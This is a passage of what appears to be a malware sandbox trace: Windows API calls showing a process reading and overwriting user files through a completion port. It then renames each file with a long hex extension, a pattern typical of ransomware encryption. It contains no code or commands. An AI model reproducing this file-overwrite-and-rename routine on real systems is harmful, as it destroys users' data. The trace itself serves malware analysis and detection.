lpBuffer=0x31130f8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0) returned 1 [0112.765] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0112.776] ReadFile (in: hFile=0x330, lpBuffer=0x30c0180, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048) returned 1 [0112.776] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0112.784] WriteFile (in: hFile=0x330, lpBuffer=0x30c0180, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048) returned 0x0 [0112.784] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0112.791] NtQueryObject (in: Handle=0x330, ObjectInformationClass=0x1, ObjectInformation=0x30a00f8, ObjectInformationLength=0x10004, ReturnLength=0x25fff70 | out: ObjectInformation=0x30a00f8, ReturnLength=0x25fff70) returned 0x0 [0112.791] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ScreenshotOptIn.png", lpString2=".A07EC6E01C4E78050890E488472DBE051126FE4A91A371A5454D7A479BC8DE50" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ScreenshotOptIn.png.A07EC6E01C4E78050890E488472DBE051126FE4A91A371A5454D7A479BC8DE50") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ScreenshotOptIn.png.A07EC6E01C4E78050890E488472DBE051126FE4A91A371A5454D7A479BC8DE50" [0112.791] GetProcessHeap () returned 0x600000 [0112.791] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x174) returned 0x63b710 [0112.792] NtSetInformationFile (FileHandle=0x330, IoStatusBlock=0x25fff60, FileInformation=0x63b710, Length=0x174, FileInformationClass=0xa) returned 0x0 [0112.802] CloseHandle (hObject=0x330) returned 1 [0112.805] GetProcessHeap () returned 0x600000 [0112.805] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0112.807] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0112.822] ReadFile (in: hFile=0x330, lpBuffer=0x30c0180, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048) returned 1 [0112.822] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0112.823] WriteFile (in: hFile=0x330, lpBuffer=0x30c0180*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048) returned 1 [0112.826] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0112.827] NtQueryObject (in: Handle=0x330, ObjectInformationClass=0x1, ObjectInformation=0x30a00f8, ObjectInformationLength=0x10004, ReturnLength=0x25fff70 | out: ObjectInformation=0x30a00f8, ReturnLength=0x25fff70) returned 0x0 [0112.827] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\amd64\\FileSyncApi64.dll", lpString2=".724A8373DA85175A79160CED08B8F9A866BC6F151FDBDF524D253CAB97337B46" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\amd64\\FileSyncApi64.dll.724A8373DA85175A79160CED08B8F9A866BC6F151FDBDF524D253CAB97337B46") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\amd64\\FileSyncApi64.dll.724A8373DA85175A79160CED08B8F9A866BC6F151FDBDF524D253CAB97337B46" [0112.827] GetProcessHeap () returned 0x600000 [0112.827] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x17c) returned 0x63a1a0 [0112.827] NtSetInformationFile (FileHandle=0x330, IoStatusBlock=0x25fff60, FileInformation=0x63a1a0, Length=0x17c, FileInformationClass=0xa) returned 0x0 [0112.828] CloseHandle (hObject=0x330) returned 1 [0112.828] GetProcessHeap () returned 0x600000 [0112.828] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0112.830] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0112.832] WriteFile (in: hFile=0x310, lpBuffer=0x680470*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x660338 | out: lpBuffer=0x680470*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x660338) returned 1 [0112.832] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0112.959] ReadFile (in: hFile=0x330, lpBuffer=0x680470, nNumberOfBytesToRead=0x7200, lpNumberOfBytesRead=0x0, lpOverlapped=0x660338 | out: lpBuffer=0x680470*, lpNumberOfBytesRead=0x0, lpOverlapped=0x660338) returned 1 [0112.959] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0112.960] WriteFile (in: hFile=0x330, lpBuffer=0x680470, nNumberOfBytesToWrite=0x7200, lpNumberOfBytesWritten=0x0, lpOverlapped=0x660338 | out: lpBuffer=0x680470, lpNumberOfBytesWritten=0x0, lpOverlapped=0x660338) returned 0x0 [0112.960] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0112.961] NtQueryObject (in: Handle=0x330, ObjectInformationClass=0x1, ObjectInformation=0x6603e8, ObjectInformationLength=0x10004, ReturnLength=0x25fff70 | out: ObjectInformation=0x6603e8, ReturnLength=0x25fff70) returned 0x0 [0112.962] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ETWlog.dll", lpString2=".711B3C1EFBF96BA0C3D2C8AA108DE46FEB4EF80D3051E1C060F7B400CD7FA548" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ETWlog.dll.711B3C1EFBF96BA0C3D2C8AA108DE46FEB4EF80D3051E1C060F7B400CD7FA548") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ETWlog.dll.711B3C1EFBF96BA0C3D2C8AA108DE46FEB4EF80D3051E1C060F7B400CD7FA548" [0112.962] GetProcessHeap () returned 0x600000 [0112.962] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x162) returned 0x3160d98 [0112.962] NtSetInformationFile (FileHandle=0x330, IoStatusBlock=0x25fff60, FileInformation=0x3160d98, Length=0x162, FileInformationClass=0xa) returned 0x0 [0112.963] CloseHandle (hObject=0x330) returned 1 [0112.963] GetProcessHeap () returned 0x600000 [0112.964] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x660338 | out: hHeap=0x600000) returned 1 [0112.964] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0113.624] ReadFile (in: hFile=0x310, lpBuffer=0x680470, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x660338 | out: lpBuffer=0x680470*, lpNumberOfBytesRead=0x0, lpOverlapped=0x660338) returned 1 [0113.624] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0113.624] WriteFile (in: hFile=0x328, lpBuffer=0x6a85c8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x688490 | out: lpBuffer=0x6a85c8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x688490) returned 1 [0113.628] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0114.177] ReadFile (in: hFile=0x308, lpBuffer=0x32c0180, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x32a0048 | out: lpBuffer=0x32c0180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x32a0048) returned 1 [0114.179] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0114.179] WriteFile (in: hFile=0x308, lpBuffer=0x32c0180*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x32a0048 | out: lpBuffer=0x32c0180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x32a0048) returned 1 [0114.180] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0114.396] WriteFile (in: hFile=0x32c, lpBuffer=0x680470*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x660338 | out: lpBuffer=0x680470*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x660338) returned 1 [0114.399] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0114.400] NtQueryObject (in: Handle=0x32c, ObjectInformationClass=0x1, ObjectInformation=0x6603e8, ObjectInformationLength=0x10004, ReturnLength=0x25fff70 | out: ObjectInformation=0x6603e8, ReturnLength=0x25fff70) returned 0x0 [0114.401] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\Microsoft.3DBuilder_10.9.50.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat", lpString2=".733E34C98EFA0F9507F1A0B05A63E4680F3C42A45E0B2D4715C5C072FE6BFF4B" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\Microsoft.3DBuilder_10.9.50.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat.733E34C98EFA0F9507F1A0B05A63E4680F3C42A45E0B2D4715C5C072FE6BFF4B") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.3DBuilder_8wekyb3d8bbwe\\Microsoft.3DBuilder_10.9.50.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat.733E34C98EFA0F9507F1A0B05A63E4680F3C42A45E0B2D4715C5C072FE6BFF4B" [0114.401] GetProcessHeap () returned 0x600000 [0114.401] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x204) returned 0x63e2c8 [0114.401] NtSetInformationFile (FileHandle=0x32c, IoStatusBlock=0x25fff60, FileInformation=0x63e2c8, Length=0x204, FileInformationClass=0xa) returned 0x0 [0114.402] CloseHandle (hObject=0x32c) returned 1 [0114.402] GetProcessHeap () returned 0x600000 [0114.402] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x660338 | out: hHeap=0x600000) returned 1 [0114.404] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0114.496] ReadFile (in: hFile=0x32c, lpBuffer=0x31130f8, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0) returned 1 [0114.496] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0114.496] WriteFile (in: hFile=0x32c, lpBuffer=0x31130f8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0) returned 1 [0114.497] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0114.498] NtQueryObject (in: Handle=0x32c, ObjectInformationClass=0x1, ObjectInformation=0x30f3070, ObjectInformationLength=0x10004, ReturnLength=0x25fff70 | out: ObjectInformation=0x30f3070, ReturnLength=0x25fff70) returned 0x0 [0114.498] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\Settings\\settings.dat", lpString2=".74924E3D3D11E6B265C94E98CF5C8D8F30B68C1A5F1BBB353A6BAA77F2611821" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\Settings\\settings.dat.74924E3D3D11E6B265C94E98CF5C8D8F30B68C1A5F1BBB353A6BAA77F2611821") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\Settings\\settings.dat.74924E3D3D11E6B265C94E98CF5C8D8F30B68C1A5F1BBB353A6BAA77F2611821" [0114.498] GetProcessHeap () returned 0x600000 [0114.498] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x194) returned 0x63dc40 [0114.498] NtSetInformationFile (FileHandle=0x32c, IoStatusBlock=0x25fff60, FileInformation=0x63dc40, Length=0x194, FileInformationClass=0xa) returned 0x0 [0114.499] CloseHandle (hObject=0x32c) returned 1 [0114.500] GetProcessHeap () returned 0x600000 [0114.500] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0114.501] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0114.798] ReadFile (in: hFile=0x214, lpBuffer=0x680470, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x660338 | out: lpBuffer=0x680470*, lpNumberOfBytesRead=0x0, lpOverlapped=0x660338) returned 1 [0114.831] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0114.998] ReadFile (in: hFile=0x324, lpBuffer=0x680470, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x0, lpOverlapped=0x660338 | out: lpBuffer=0x680470*, lpNumberOfBytesRead=0x0, lpOverlapped=0x660338) returned 1 [0115.001] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0115.004] NtQueryObject (in: Handle=0x324, ObjectInformationClass=0x1, ObjectInformation=0x6603e8, ObjectInformationLength=0x10004, ReturnLength=0x25fff70 | out: ObjectInformation=0x6603e8, ReturnLength=0x25fff70) returned 0x0 [0115.005] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\Microsoft.Appconnector_1.3.3.0_neutral__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat", lpString2=".71DB8FB7EBD31ADDBBEC8E87DF86A95264CB5B9BA3A36930E159CFBB7FE63D65" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\Microsoft.Appconnector_1.3.3.0_neutral__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat.71DB8FB7EBD31ADDBBEC8E87DF86A95264CB5B9BA3A36930E159CFBB7FE63D65") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\Microsoft.Appconnector_1.3.3.0_neutral__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat.71DB8FB7EBD31ADDBBEC8E87DF86A95264CB5B9BA3A36930E159CFBB7FE63D65" [0115.005] GetProcessHeap () returned 0x600000 [0115.005] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x214) returned 0x63f858 [0115.005] NtSetInformationFile (FileHandle=0x324, IoStatusBlock=0x25fff60, FileInformation=0x63f858, Length=0x214, FileInformationClass=0xa) returned 0x0 [0115.006] CloseHandle (hObject=0x324) returned 1 [0115.007] GetProcessHeap () returned 0x600000 [0115.007] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x660338 | out: hHeap=0x600000) returned 1 [0115.009] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0115.024] ReadFile (in: hFile=0x324, lpBuffer=0x31130f8, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0) returned 1 [0115.025] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0115.025] WriteFile (in: hFile=0x324, lpBuffer=0x31130f8, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0) returned 0x0 [0115.026] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0115.027] NtQueryObject (in: Handle=0x324, ObjectInformationClass=0x1, ObjectInformation=0x30f3070, ObjectInformationLength=0x10004, ReturnLength=0x25fff70 | out: ObjectInformation=0x30f3070, ReturnLength=0x25fff70) returned 0x0 [0115.027] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\Settings\\settings.dat", lpString2=".464CE52A0C4E2A2037A64D6BE2B3364770F8350C61B68D01B760AE4B78030467" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\Settings\\settings.dat.464CE52A0C4E2A2037A64D6BE2B3364770F8350C61B68D01B760AE4B78030467") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\Settings\\settings.dat.464CE52A0C4E2A2037A64D6BE2B3364770F8350C61B68D01B760AE4B78030467" [0115.027] GetProcessHeap () returned 0x600000 [0115.028] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x18c) returned 0x6b35f8 [0115.028] NtSetInformationFile (FileHandle=0x324, IoStatusBlock=0x25fff60, FileInformation=0x6b35f8, Length=0x18c, FileInformationClass=0xa) returned 0x0 [0115.029] CloseHandle (hObject=0x324) returned 1 [0115.030] GetProcessHeap () returned 0x600000 [0115.030] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0115.031] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0115.123] ReadFile (in: hFile=0x320, lpBuffer=0x680470, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x660338 | out: lpBuffer=0x680470*, lpNumberOfBytesRead=0x0, lpOverlapped=0x660338) returned 1 [0115.124] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0115.129] NtQueryObject (in: Handle=0x320, ObjectInformationClass=0x1, ObjectInformation=0x6603e8, ObjectInformationLength=0x10004, ReturnLength=0x25fff70 | out: ObjectInformation=0x6603e8, ReturnLength=0x25fff70) returned 0x0 [0115.129] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\Microsoft.BingFinance_4.6.169.0_x86__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat", lpString2=".8994470541104B69725177609307C32A8D22F7765387A38F0CB272A06A17F807" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\Microsoft.BingFinance_4.6.169.0_x86__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat.8994470541104B69725177609307C32A8D22F7765387A38F0CB272A06A17F807") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\Microsoft.BingFinance_4.6.169.0_x86__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat.8994470541104B69725177609307C32A8D22F7765387A38F0CB272A06A17F807" [0115.129] GetProcessHeap () returned 0x600000 [0115.129] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x20c) returned 0x6b3790 [0115.129] NtSetInformationFile (FileHandle=0x320, IoStatusBlock=0x25fff60, FileInformation=0x6b3790, Length=0x20c, FileInformationClass=0xa) returned 0x0 [0115.131] CloseHandle (hObject=0x320) returned 1 [0115.131] GetProcessHeap () returned 0x600000 [0115.131] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x660338 | out: hHeap=0x600000) returned 1 [0115.132] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0115.166] ReadFile (in: hFile=0x320, lpBuffer=0x31130f8, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0) returned 1 [0115.166] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0115.166] WriteFile (in: hFile=0x320, lpBuffer=0x31130f8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0) returned 1 [0115.167] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0115.168] NtQueryObject (in: Handle=0x320, ObjectInformationClass=0x1, ObjectInformation=0x30f3070, ObjectInformationLength=0x10004, 